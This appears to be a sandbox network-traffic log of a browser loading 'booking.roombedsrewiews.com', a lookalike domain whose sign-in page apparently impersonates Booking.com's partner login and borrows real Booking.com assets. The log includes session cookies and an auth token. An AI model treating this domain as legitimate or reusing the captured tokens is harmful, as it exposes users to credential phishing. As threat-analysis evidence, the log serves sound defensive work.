PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/a HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/message_alert.svg HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/message_tip.svg HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/ls.unveilhooks.min.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/71cd12cdf77ebcb750cff91a9bba6f04.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://booking.roombedsrewiews.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset_332_350x180px.png.png HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/optimize.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/munchkin.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/otBannerSdk.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_H7dPp81WTvvS--0HVXMJ9Hozig2DMTF7X1aURkZvL00.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/asset_332_350x180px.png.png HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /munchkin.js HTTP/1.1Host: munchkin.marketo.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.woff?v=1.3.3 HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveOrigin: https://booking.roombedsrewiews.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://booking.roombedsrewiews.com/static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /164/munchkin.js HTTP/1.1Host: munchkin.marketo.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.ttf?v=1.3.3 HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveOrigin: https://booking.roombedsrewiews.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://booking.roombedsrewiews.com/static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm; _mkto_trk=id:261-NRZ-371&token:_mch-roombedsrewiews.com-764a5b858e31211af6451cf3b0b18c94
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1Host: partner.booking.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://booking.roombedsrewiews.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/favicon.svg HTTP/1.1Host: partner.booking.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /SIE/?Q_ZID=ZN_3Eum1ldyL0aIh0i HTTP/1.1Host: zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/favicon.ico HTTP/1.1Host: partner.booking.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dxjsmodule/8.7128e66c4069227926d7.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=booking.roombedsrewiews.com HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=n8kvo31qnq76cvo3qgfa7ohp3v
                Source: global trafficHTTP traffic detected: GET /api?c=1 HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm; _mkto_trk=id:261-NRZ-371&token:_mch-roombedsrewiews.com-764a5b858e31211af6451cf3b0b18c94
                Source: global trafficHTTP traffic detected: GET /dxjsmodule/CoreModule.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_3Eum1ldyL0aIh0i&Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dxjsmodule/5.76657644fe1b73dc4306.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dxjsmodule/1.63482081f3bf73c57075.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /api?c=1 HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm; _mkto_trk=id:261-NRZ-371&token:_mch-roombedsrewiews.com-764a5b858e31211af6451cf3b0b18c94
                Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
